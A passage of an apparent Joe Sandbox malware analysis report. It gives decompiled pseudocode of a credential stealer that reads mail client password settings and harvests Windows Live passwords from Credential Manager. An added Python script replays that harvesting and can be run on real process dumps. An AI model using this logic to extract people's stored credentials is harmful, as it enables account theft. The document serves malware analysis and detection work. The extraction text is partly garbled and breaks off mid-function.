                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004088BF
                                                                                                                                                      • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                                                                                                      • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                                                                                      • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,75144DE0), ref: 0040797A
                                                                                                                                                      • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@??3@$memcpy$LoadStringstrcpystrlen
                                                                                                                                                    • String ID: d$hA
                                                                                                                                                    • API String ID: 3781940870-4030989184
                                                                                                                                                    • Opcode ID: 6c64bdb5196202114d018d6502db394b3a43eca9dd46e983fc9d5c63418de248
                                                                                                                                                    • Instruction ID: 2ee817cab8fb9d662dc1fdc17dcda2a390100e1008d8253a008a3d74f0a2914d
                                                                                                                                                    • Opcode Fuzzy Hash: 6c64bdb5196202114d018d6502db394b3a43eca9dd46e983fc9d5c63418de248
                                                                                                                                                    • Instruction Fuzzy Hash: 76518D72A01704AFDB24DF2AC582B9AB7E5FF48354F10852EE54ADB391EB74E940CB44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                                    			E0040314D(void* __eax, intOrPtr _a4, char* _a8) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                    				char _v188;
                                                                                                                                                    				char _v268;
                                                                                                                                                    				char _v524;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				char* _t53;
                                                                                                                                                    				void* _t60;
                                                                                                                                                    				void* _t65;
                                                                                                                                                    				char* _t70;
                                                                                                                                                    
                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                    				_t65 = __eax;
                                                                                                                                                    				 *((intOrPtr*)(__eax + 0x8c)) = 3;
                                                                                                                                                    				 *((intOrPtr*)(__eax + 0x210)) = 1;
                                                                                                                                                    				E0040311F(_a4, "UsesIMAP",  &_v524, 0xff, _a8);
                                                                                                                                                    				if(_v524 == 0x31) {
                                                                                                                                                    					 *((intOrPtr*)(_t65 + 0x210)) = 2;
                                                                                                                                                    				}
                                                                                                                                                    				_v12 = _t65 + 0x110;
                                                                                                                                                    				E0040311F(_a4, "PopServer", _t65 + 0x110, 0x7f, _a8);
                                                                                                                                                    				_t70 = _t65 + 0x214;
                                                                                                                                                    				E0040311F(_a4, "LoginName", _t70, 0x7f, _a8);
                                                                                                                                                    				E0040311F(_a4, "RealName", _t65 + 0xc, 0x7f, _a8);
                                                                                                                                                    				E0040311F(_a4, "ReturnAddress", _t65 + 0x90, 0x7f, _a8);
                                                                                                                                                    				E0040311F(_a4, "SavePasswordText",  &_v268, 0xff, _a8);
                                                                                                                                                    				if(_v268 != 0) {
                                                                                                                                                    					_v188 = 0;
                                                                                                                                                    					E00401D5A( &_v268, _t65 + 0x294);
                                                                                                                                                    					if( *_t70 == 0) {
                                                                                                                                                    						_push(_a8);
                                                                                                                                                    						_t60 = 0x7f;
                                                                                                                                                    						_push(_t60);
                                                                                                                                                    						_push(_t70);
                                                                                                                                                    						_push("PopAccount");
                                                                                                                                                    						_push(_a4);
                                                                                                                                                    						E0040311F();
                                                                                                                                                    						if( *_t70 != 0) {
                                                                                                                                                    							_t53 = strchr(_t70, 0x40);
                                                                                                                                                    							_a8 = _t53;
                                                                                                                                                    							if(_t53 != 0) {
                                                                                                                                                    								E004060D0(_t60, _v12,  &(_t53[1]));
                                                                                                                                                    								 *_a8 = 0;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_v8 = 1;
                                                                                                                                                    				}
                                                                                                                                                    				if( *_t70 != 0) {
                                                                                                                                                    					_v8 = 1;
                                                                                                                                                    				}
                                                                                                                                                    				return _v8;
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040311F: GetPrivateProfileStringA.KERNEL32(00000000,?,Function_00012466,?,?,?), ref: 00403143
                                                                                                                                                    • strchr.MSVCRT ref: 00403262
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfileStringstrchr
                                                                                                                                                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                    • API String ID: 1348940319-1729847305
                                                                                                                                                    • Opcode ID: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                                                                                                                    • Instruction ID: 1cfb9ddeec5dd782170234712f417fe000b4b626ad5f21becf6162a2306db812
                                                                                                                                                    • Opcode Fuzzy Hash: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                                                                                                                    • Instruction Fuzzy Hash: 7631B370A04209BEEF119F20CC06FD97F6CAF14318F10816AF95C7A1D2C7B95B958B54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 16%
                                                                                                                                                    			E0040F09D(char* __eax, void* __ecx) {
                                                                                                                                                    				void* _t2;
                                                                                                                                                    				char* _t3;
                                                                                                                                                    				void* _t5;
                                                                                                                                                    				void* _t6;
                                                                                                                                                    				void* _t7;
                                                                                                                                                    
                                                                                                                                                    				_t3 = __eax;
                                                                                                                                                    				_t6 = __ecx;
                                                                                                                                                    				_t5 = 4;
                                                                                                                                                    				while(1) {
                                                                                                                                                    					_t2 =  *_t3;
                                                                                                                                                    					if(_t2 != 0x3c) {
                                                                                                                                                    						goto L3;
                                                                                                                                                    					}
                                                                                                                                                    					_push(_t5);
                                                                                                                                                    					_push("&lt;");
                                                                                                                                                    					L14:
                                                                                                                                                    					_t2 = memcpy(_t6, ??, ??);
                                                                                                                                                    					_t7 = _t7 + 0xc;
                                                                                                                                                    					_t6 = _t6 + _t5;
                                                                                                                                                    					L16:
                                                                                                                                                    					if( *_t3 != 0) {
                                                                                                                                                    						_t3 = _t3 + 1;
                                                                                                                                                    						continue;
                                                                                                                                                    					}
                                                                                                                                                    					return _t2;
                                                                                                                                                    					L3:
                                                                                                                                                    					if(_t2 != 0x3e) {
                                                                                                                                                    						if(_t2 != 0x22) {
                                                                                                                                                    							if(_t2 != 0xb0) {
                                                                                                                                                    								if(_t2 != 0x26) {
                                                                                                                                                    									if(_t2 != 0xa) {
                                                                                                                                                    										 *_t6 = _t2;
                                                                                                                                                    										_t6 = _t6 + 1;
                                                                                                                                                    									} else {
                                                                                                                                                    										_push(_t5);
                                                                                                                                                    										_push("<br>");
                                                                                                                                                    										goto L14;
                                                                                                                                                    									}
                                                                                                                                                    								} else {
                                                                                                                                                    									_push(5);
                                                                                                                                                    									_push("&amp;");
                                                                                                                                                    									goto L11;
                                                                                                                                                    								}
                                                                                                                                                    							} else {
                                                                                                                                                    								_push(5);
                                                                                                                                                    								_push("&deg;");
                                                                                                                                                    								L11:
                                                                                                                                                    								_t2 = memcpy(_t6, ??, ??);
                                                                                                                                                    								_t7 = _t7 + 0xc;
                                                                                                                                                    								_t6 = _t6 + 5;
                                                                                                                                                    							}
                                                                                                                                                    						} else {
                                                                                                                                                    							_t2 = memcpy(_t6, "&quot;", 6);
                                                                                                                                                    							_t7 = _t7 + 0xc;
                                                                                                                                                    							_t6 = _t6 + 6;
                                                                                                                                                    						}
                                                                                                                                                    					} else {
                                                                                                                                                    						_push(_t5);
                                                                                                                                                    						_push("&gt;");
                                                                                                                                                    						goto L14;
                                                                                                                                                    					}
                                                                                                                                                    					goto L16;
                                                                                                                                                    				}
                                                                                                                                                    			}
                                                                                                                                                    0x0040f0b9
                                                                                                                                                    0x0040f0ba
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040f0ba
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040f0b7

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpy
• String ID: &$°$>$<$"$
• API String ID: 3510742995-3273207271
• Opcode ID: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
• Instruction ID: 3259d816fa1e591736f6461b451ad75962e4f861ee845343ab42ffe8f3feec31
• Opcode Fuzzy Hash: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
• Instruction Fuzzy Hash: 450171B2E852A4B5DA350905AC07FA70B865BA6B11F350037F58639AC2E1AD0D8F516F
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 69%
// Joe Sandbox pseudocode for E0040D865, taken from the memory dump of process 15 (vbc) at image base 0x00400000.
// The comments are editorial annotations, not decompiler output. They are inferred from the visible string
// constants and from the field offsets a 32-bit process uses for CREDENTIALW
// (Type +0x4, TargetName +0x8, CredentialBlobSize +0x18, CredentialBlob +0x1c, UserName +0x30).
E0040D865(intOrPtr* _a4) {              // _a4: result object; *_a4 is a vtable, +4 and +8 are counters
    char _v260;                         // ANSI copy of the password (CredentialBlob), 0xff bytes
    char _v516;                         // ANSI copy of UserName, 0xff bytes; the password buffer follows it
    void _v771;
    char _v772;                         // ANSI copy of TargetName, 0xff bytes
    intOrPtr _v776;                     // resolved function pointer, called like CredEnumerateW(filter, 0, &count, &creds)
    intOrPtr _v780;                     // non-zero once the imports in _v800 were resolved
    intOrPtr _v788;                     // resolved function pointer, called like CredFree(creds)
    int _v796;
    char _v800;                         // import table filled by E00404647 and released by E004046C2
    signed int _v804;                   // loop index
    char _v808;                         // array of CREDENTIALW pointers returned by the enumerator
    char _v812;                         // number of credentials returned
    void* __edi;
    void* __esi;
    intOrPtr* _t52;
    void* _t53;
    void* _t57;
    signed int _t58;
    char* _t65;
    unsigned int _t68;
    intOrPtr _t69;
    void* _t85;
    char* _t89;
    intOrPtr _t92;
    intOrPtr* _t93;
    signed int _t94;
    void* _t96;

    _t52 = _a4;
    _t96 = (_t94 & 0xfffffff8) - 0x32c;
    _push(_t85);
     *((intOrPtr*)(_t52 + 4)) = 0;       // reported-credential counter
     *((intOrPtr*)(_t52 + 8)) = 0;       // empty-password counter
    _t89 = 0;                           // enumeration filter: NULL means every credential
    _t53 = E00406278();                 // version query; the field at +4 is compared with 5
    _t97 =  *((intOrPtr*)(_t53 + 4)) - 5;
    if( *((intOrPtr*)(_t53 + 4)) > 5) {
        _t89 = L"WindowsLive:name=*";  // on Vista and later only Windows Live entries are requested
    }
    _v800 = 0;
    _v796 = 0;
    if(E00404647( &_v800, _t85, _t97) == 0) {   // resolve the credential API; give up if unavailable
        L21:
        return E004046C2( &_v800);
    }
    _v808 = 0;
    _v812 = 0;
    if(_v780 == 0) {
        _t57 = 0;
        __eflags = 0;
    } else {
        _t57 = _v776(_t89, 0,  &_v812,  &_v808);  // enumerate: count into _v812, pointer array into _v808
    }
    if(_t57 == 0) {
        goto L21;
    } else {
        _t58 = 0;
        _v804 = 0;
        if(_v812 <= 0) {
            L20:
            _v788(_v808);               // free the enumeration buffer
            goto L21;
        } else {
            do {
                _t92 =  *((intOrPtr*)(_v808 + _t58 * 4));   // _t92: current CREDENTIALW
                // Type == CRED_TYPE_GENERIC (1), TargetName != NULL, UserName != NULL
                if( *((intOrPtr*)(_t92 + 4)) == 1 &&  *(_t92 + 8) != 0 &&  *(_t92 + 0x30) != 0) {
                    _v772 = 0;
                    memset( &_v771, 0, 0xff);
                    _t96 = _t96 + 0xc;
                    // TargetName to ANSI
                    if(WideCharToMultiByte(0, 0,  *(_t92 + 8), 0xffffffff,  &_v772, 0xff, 0, 0) > 0) {
                        _push(0x11);
                        _t65 =  &_v772;
                        _push("windowslive:name=");
                        _push(_t65);
                        // 17-byte prefix compare; stored names are mixed case while the constant is lower
                        // case, so this is a case-insensitive compare (_strnicmp-like) returning 0 on match
                        L00411612();
                        _t96 = _t96 + 0xc;
                        if(_t65 == 0) {
                            _v516 = 0;
                            _v260 = 0;
                            // UserName to ANSI
                            WideCharToMultiByte(0, 0,  *(_t92 + 0x30), 0xffffffff,  &_v516, 0xff, 0, 0);
                            _t68 =  *(_t92 + 0x18);    // CredentialBlobSize in bytes
                            if(_t68 > 0) {
                                // CredentialBlob is UTF-16 text: convert _t68 >> 1 wide characters
                                WideCharToMultiByte(0, 0,  *(_t92 + 0x1c), _t68 >> 1,  &_v260, 0xff, 0, 0);
                                 *((char*)(_t96 + ( *(_t92 + 0x18) >> 1) + 0x238)) = 0;   // NUL-terminate the password
                            }
                            if(_v260 == 0) {
                                // empty password: count it at _a4+8, do not report
                                _t69 = _a4;
                                _t44 = _t69 + 8;
                                 *_t44 =  *((intOrPtr*)(_t69 + 8)) + 1;
                                __eflags =  *_t44;
                            } else {
                                // report user (and the password buffer behind it) through the vtable slot at +4
                                _t93 = _a4;
                                 *((intOrPtr*)( *_t93 + 4))( &_v516);
                                 *((intOrPtr*)(_t93 + 4)) =  *((intOrPtr*)(_t93 + 4)) + 1;
                            }
                        }
                    }
                }
                _t58 = _v804 + 1;
                _v804 = _t58;
            } while (_t58 < _v812);
            goto L20;
        }
    }
}
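The pseudocode above is the Windows Live credential harvester that MailPassView-style stealers share: it asks the Credential Manager enumerator for entries, keeps only CRED_TYPE_GENERIC records whose TargetName starts with windowslive:name=, and treats CredentialBlob as a UTF-16 password. The Python below is an added editorial example, not Joe Sandbox output and not code from the sample. It assumes the 32-bit CREDENTIALW layout (so the raw offsets the decompiler prints can be checked against field names), assumes the 17-byte compare at L00411612 is case-insensitive (the stored names are mixed case while the constant is lower case), and replays the loop's filtering over a constructed in-memory image with a made-up base address of 0x00300000; the same parser can be pointed at a real process dump to reconstruct what the stealer would have reported.

```python
"""Check the CREDENTIALW offsets used by E0040D865 and replay its filtering on a constructed image."""
import ctypes
import struct

CRED_TYPE_GENERIC = 1
TARGET_PREFIX = "windowslive:name="   # compared over 0x11 = 17 characters in the pseudocode
ENUM_FILTER = "WindowsLive:name=*"    # passed to the enumerator only when the version field is > 5


class CREDENTIALW32(ctypes.LittleEndianStructure):
    """CREDENTIALW as a 32-bit process sees it: every pointer is 4 bytes wide."""
    _pack_ = 4
    _fields_ = [
        ("Flags", ctypes.c_uint32),
        ("Type", ctypes.c_uint32),
        ("TargetName", ctypes.c_uint32),        # LPWSTR
        ("Comment", ctypes.c_uint32),           # LPWSTR
        ("LastWrittenLow", ctypes.c_uint32),    # FILETIME.dwLowDateTime
        ("LastWrittenHigh", ctypes.c_uint32),   # FILETIME.dwHighDateTime
        ("CredentialBlobSize", ctypes.c_uint32),
        ("CredentialBlob", ctypes.c_uint32),    # LPBYTE
        ("Persist", ctypes.c_uint32),
        ("AttributeCount", ctypes.c_uint32),
        ("Attributes", ctypes.c_uint32),        # PCREDENTIAL_ATTRIBUTEW
        ("TargetAlias", ctypes.c_uint32),       # LPWSTR
        ("UserName", ctypes.c_uint32),          # LPWSTR
    ]


def struct_size():
    return ctypes.sizeof(CREDENTIALW32)


def field_at(offset):
    """Name of the CREDENTIALW field that a 32-bit `*(cred + offset)` reads."""
    for name, _ in CREDENTIALW32._fields_:
        if getattr(CREDENTIALW32, name).offset == offset:
            return name
    raise KeyError(hex(offset))


def enumeration_filter(version_major):
    """Mirror the version branch: a Windows Live filter on Vista and later, NULL (everything) before."""
    return ENUM_FILTER if version_major > 5 else None


class Image:
    """Flat little-endian memory image with a base virtual address (constructed, not a real dump)."""

    def __init__(self, base):
        self.base = base
        self.data = bytearray()

    def place(self, blob):
        """Append `blob` 4-byte aligned and return its virtual address."""
        while len(self.data) % 4:
            self.data.append(0)
        va = self.base + len(self.data)
        self.data += blob
        return va

    def read(self, va, size):
        off = va - self.base
        if off < 0 or off + size > len(self.data):
            raise ValueError("read outside image: %#x" % va)
        return bytes(self.data[off:off + size])

    def read_u32(self, va):
        return struct.unpack_from("<I", self.data, va - self.base)[0]

    def read_wstr(self, va):
        """NUL-terminated UTF-16LE string, what WideCharToMultiByte(..., -1, ...) consumes."""
        off = end = va - self.base
        while end + 2 <= len(self.data) and self.data[end:end + 2] != b"\x00\x00":
            end += 2
        return self.data[off:end].decode("utf-16-le")


def build_image(records, base=0x00300000):
    """Lay records out as the enumerator would: CREDENTIALW structs, their strings, and a pointer array."""
    img = Image(base)
    ptrs = []
    for rec in records:
        cred = CREDENTIALW32()
        cred.Type = rec["type"]
        cred.TargetName = img.place(rec["target"].encode("utf-16-le") + b"\x00\x00")
        cred.UserName = img.place(rec["user"].encode("utf-16-le") + b"\x00\x00")
        blob = rec["password"].encode("utf-16-le")   # Windows Live stored the password as UTF-16 text
        cred.CredentialBlobSize = len(blob)
        cred.CredentialBlob = img.place(blob) if blob else 0
        ptrs.append(img.place(bytes(cred)))
    array_va = img.place(b"".join(struct.pack("<I", p) for p in ptrs))
    return img, array_va, len(ptrs)


def harvest(img, array_va, count):
    """Replay the loop of E0040D865: returns (reported (user, password) pairs, empty-password count)."""
    found, empty = [], 0
    for i in range(count):
        cred = CREDENTIALW32.from_buffer_copy(img.read(img.read_u32(array_va + 4 * i), struct_size()))
        # *(cred+4) == 1 && *(cred+8) != 0 && *(cred+0x30) != 0
        if cred.Type != CRED_TYPE_GENERIC or not cred.TargetName or not cred.UserName:
            continue
        # 17-byte case-insensitive prefix compare against "windowslive:name=" (assumed _strnicmp semantics)
        if img.read_wstr(cred.TargetName)[:len(TARGET_PREFIX)].lower() != TARGET_PREFIX:
            continue
        user = img.read_wstr(cred.UserName)[:255]               # 0xff-byte ANSI buffer
        password = ""
        if cred.CredentialBlobSize > 0:                          # converted as CredentialBlobSize >> 1 wide chars
            raw = img.read(cred.CredentialBlob, cred.CredentialBlobSize)
            password = raw[:(cred.CredentialBlobSize >> 1) * 2].decode("utf-16-le", "replace")[:255]
        if password == "":
            empty += 1                                           # *(_a4 + 8)++
        else:
            found.append((user, password))                       # callback, then *(_a4 + 4)++
    return found, empty


SAMPLE_RECORDS = [   # constructed test data, not from the analysed sample
    {"type": CRED_TYPE_GENERIC, "target": "WindowsLive:name=alice@example.com",
     "user": "alice@example.com", "password": "Pa55w0rd!"},
    {"type": CRED_TYPE_GENERIC, "target": "WindowsLive:name=bob@example.com",
     "user": "bob@example.com", "password": ""},                 # counted, not reported
    {"type": 2, "target": "WindowsLive:name=carol@example.com",
     "user": "carol@example.com", "password": "x"},              # CRED_TYPE_DOMAIN_PASSWORD: ignored
    {"type": CRED_TYPE_GENERIC, "target": "git:https://example.com",
     "user": "dave", "password": "token"},                       # wrong prefix: ignored
]


def demo():
    img, array_va, n = build_image(SAMPLE_RECORDS)
    return harvest(img, array_va, n)


if __name__ == "__main__":
    for off in (0x4, 0x8, 0x18, 0x1C, 0x30):
        print("cred+%#x -> %s" % (off, field_at(off)))
    print(demo())
```

Running it prints the offset-to-field mapping and the harvested pairs. The two values `harvest` returns correspond to the two counters the pseudocode keeps at _a4+4 (reported) and _a4+8 (empty password), which is what a detection engineer needs when deciding whether a given Credential Manager entry would have left the host in the sample's exfiltration.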
Address column for the E0040D865 pseudocode above (instructions from 0x0040d86b; the per-line mapping did not survive extraction).
                                                                                                                                                    0x0040d9ad
                                                                                                                                                    0x0040d9c6
                                                                                                                                                    0x0040d9c9
                                                                                                                                                    0x0040d9c9
                                                                                                                                                    0x0040d9c9
                                                                                                                                                    0x0040d9af
                                                                                                                                                    0x0040d9af
                                                                                                                                                    0x0040d9be
                                                                                                                                                    0x0040d9c1
                                                                                                                                                    0x0040d9c1
                                                                                                                                                    0x0040d9ad
                                                                                                                                                    0x0040d952
                                                                                                                                                    0x0040d936
                                                                                                                                                    0x0040d9d0
                                                                                                                                                    0x0040d9d5
                                                                                                                                                    0x0040d9d5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d8e9
                                                                                                                                                    0x0040d8de

APIs
  • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
• memset.MSVCRT ref: 0040D917
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040D92E
• _strnicmp.MSVCRT ref: 0040D948
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D974
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D994
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$Version_strnicmpmemset
• String ID: WindowsLive:name=*$windowslive:name=
• API String ID: 945165440-3589380929
• Opcode ID: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
• Instruction ID: 27d6d704735a973bd95cec350459a8e2137e61d4893fa240fc9d50cc053063f8
• Opcode Fuzzy Hash: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
• Instruction Fuzzy Hash: FD4183B1904345AFC720EF54D9849ABBBECEB84344F044A3EF995A3291D734DD48CB66
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 78%
/* Editor's annotation (not part of the decompiler output): per the API list
   below, L004115B2 is the _stricmp call against "sysdatetimepick32" and
   E00407EC3 calls _itoa. _t35, the control id returned by GetDlgCtrlID, is
   used but never declared by the decompiler. The function reads a dialog
   control's text and class name and passes the text on together with its id. */
E00407FEB(void* __ecx, void* __eflags, struct HWND__* _a4) {
    void _v259;
    char _v260;
    void _v4359;
    char _v4360;
    int _t17;
    CHAR* _t26;

    E004118A0(0x1104, __ecx);
    _v4360 = 0;
    memset( &_v4359, 0, 0x1000);
    _t17 = GetDlgCtrlID(_a4);
    _t35 = _t17;
    GetWindowTextA(_a4,  &_v4360, 0x1000);
    if(_t17 > 0 && _v4360 != 0) {
        _v260 = 0;
        memset( &_v259, 0, 0xff);
        GetClassNameA(_a4,  &_v260, 0xff);
        _t26 =  &_v260;
        _push("sysdatetimepick32");
        _push(_t26);
        L004115B2();   /* _stricmp(class name, "sysdatetimepick32"), see API list */
        if(_t26 != 0) {
            E00407EC3(_t35,  &_v4360);
        }
    }
    return 1;
}


APIs
• memset.MSVCRT ref: 00408011
• GetDlgCtrlID.USER32 ref: 0040801C
• GetWindowTextA.USER32 ref: 0040802F
• memset.MSVCRT ref: 00408055
• GetClassNameA.USER32(?,?,000000FF), ref: 00408068
• _stricmp.MSVCRT(?,sysdatetimepick32), ref: 0040807A
  • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$ClassCtrlNameTextWindow_itoa_stricmp
• String ID: sysdatetimepick32
• API String ID: 896699463-4169760276
• Opcode ID: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
• Instruction ID: 1a4d9fd07e56cfca2567f2ea4562d04845e15f14fd3b0b17285a92413f4c7fe9
• Opcode Fuzzy Hash: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
• Instruction Fuzzy Hash: 8811E3728040187EDB119B64DC81DEB7BACEF58355F0440BBFB49E2151EA789FC88B69
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 98%
/* Editor's annotation (not part of the decompiler output): this is a window
   message handler. 0x4e is WM_NOTIFY, so _a12 is the NMHDR pointer; +4 is
   idFrom (0x3e9 = control id 1001) and +8 is the notification code:
   0xfffffffd = -3 = NM_DBLCLK, 0xffffff9b = -101 = LVN_ITEMCHANGED. For a
   list-view notification, +0xc is iItem, +0x14 uNewState and +0x18 uOldState;
   0xf000 is LVIS_STATEIMAGEMASK and 0x2 is LVIS_SELECTED. The decompiled
   function is cut off at the end of the report excerpt. */
E00405715(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
    signed int _v8;
    intOrPtr _v16;
    void* __esi;
    void* _t74;
    void* _t75;
    signed int _t76;
    signed int _t89;
    signed int _t90;
    void* _t98;
    void* _t101;
    short* _t118;
    unsigned int _t126;
    intOrPtr _t128;
    signed int _t131;
    void* _t144;
    intOrPtr* _t146;
    short _t153;
    signed int _t155;

    _t129 = __ecx;
    _push(__ecx);
    _t74 = _a4 - 0x4e;               /* WM_NOTIFY */
    _t155 = __ecx;
    if(_t74 == 0) {
        _t146 = _a12;                /* NMHDR* */
        __eflags =  *((intOrPtr*)(_t146 + 8)) - 0xfffffffd;
        if( *((intOrPtr*)(_t146 + 8)) == 0xfffffffd) {          /* NM_DBLCLK */
            __eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
            if(__eflags == 0) {                                  /* idFrom == 1001 */
                E00404D42(__eflags,  *_t146,  *(_t146 + 0xc));
            }
        }
        __eflags =  *((intOrPtr*)(_t146 + 8)) - 0xffffff9b;
        if( *((intOrPtr*)(_t146 + 8)) != 0xffffff9b) {          /* LVN_ITEMCHANGED */
            L27:
            _t75 = 0;
            __eflags = 0;
            goto L28;
        } else {
            __eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
            if( *((intOrPtr*)(_t146 + 4)) != 0x3e9) {
                goto L27;
            }
            _t76 =  *(_t146 + 0x14);                             /* uNewState */
            __eflags = _t76 & 0x00000002;                        /* LVIS_SELECTED */
            if((_t76 & 0x00000002) == 0) {
                L36:
                _t131 =  *(_t146 + 0x18) ^ _t76;                 /* uOldState ^ uNewState */
                __eflags = 0x0000f000 & _t131;                   /* LVIS_STATEIMAGEMASK */
                if((0x0000f000 & _t131) == 0) {
                    L39:
                    __eflags =  *(_t146 + 0x14) & 0x00000002;
                    if(( *(_t146 + 0x14) & 0x00000002) == 0) {
                        goto L27;
                    }
                    __eflags =  *(_t146 + 0x18) & 0x00000002;
                    if(( *(_t146 + 0x18) & 0x00000002) != 0) {
                        goto L27;
                    }
                    __eflags =  *(_t146 + 0xc);
                    E00401469(_t155, 0x3eb, 0 |  *(_t146 + 0xc) != 0x00000000);
                    __eflags =  *(_t146 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 1;
                                                                                                                                                    								E00401469(_t155, 0x3ec, 0 |  *(_t146 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 0x00000001);
                                                                                                                                                    								 *((intOrPtr*)(_t155 + 0x14)) = 1;
                                                                                                                                                    								SetDlgItemInt( *(_t155 + 4), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) +  *(_t146 + 0x28) * 4), 0);
                                                                                                                                                    								 *((intOrPtr*)(_t155 + 0x14)) = 0;
                                                                                                                                                    								_t75 = 1;
                                                                                                                                                    								L28:
                                                                                                                                                    								return _t75;
                                                                                                                                                    							}
                                                                                                                                                    							L37:
                                                                                                                                                    							_t89 = E004048DC( *_t146,  *(_t146 + 0xc), 0xf002);
                                                                                                                                                    							__eflags = _t89 & 0x00000002;
                                                                                                                                                    							if((_t89 & 0x00000002) != 0) {
                                                                                                                                                    								_t90 = _t89 & 0x0000f000;
                                                                                                                                                    								__eflags = _t90 - 0x1000;
                                                                                                                                                    								_v8 = _t90;
                                                                                                                                                    								E00401469(_t155, 0x3ee, 0 | _t90 == 0x00001000);
                                                                                                                                                    								_v16 - 0x2000 = _v16 == 0x2000;
                                                                                                                                                    								E00401469(_t155, 0x3ef, 0 | _v16 == 0x00002000);
                                                                                                                                                    							}
                                                                                                                                                    							goto L39;
                                                                                                                                                    						}
                                                                                                                                                    						__eflags =  *(_t146 + 0x18) & 0x00000002;
                                                                                                                                                    						if(( *(_t146 + 0x18) & 0x00000002) == 0) {
                                                                                                                                                    							goto L37;
                                                                                                                                                    						}
                                                                                                                                                    						goto L36;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				_t98 = _t74 - 0xc2;
                                                                                                                                                    				if(_t98 == 0) {
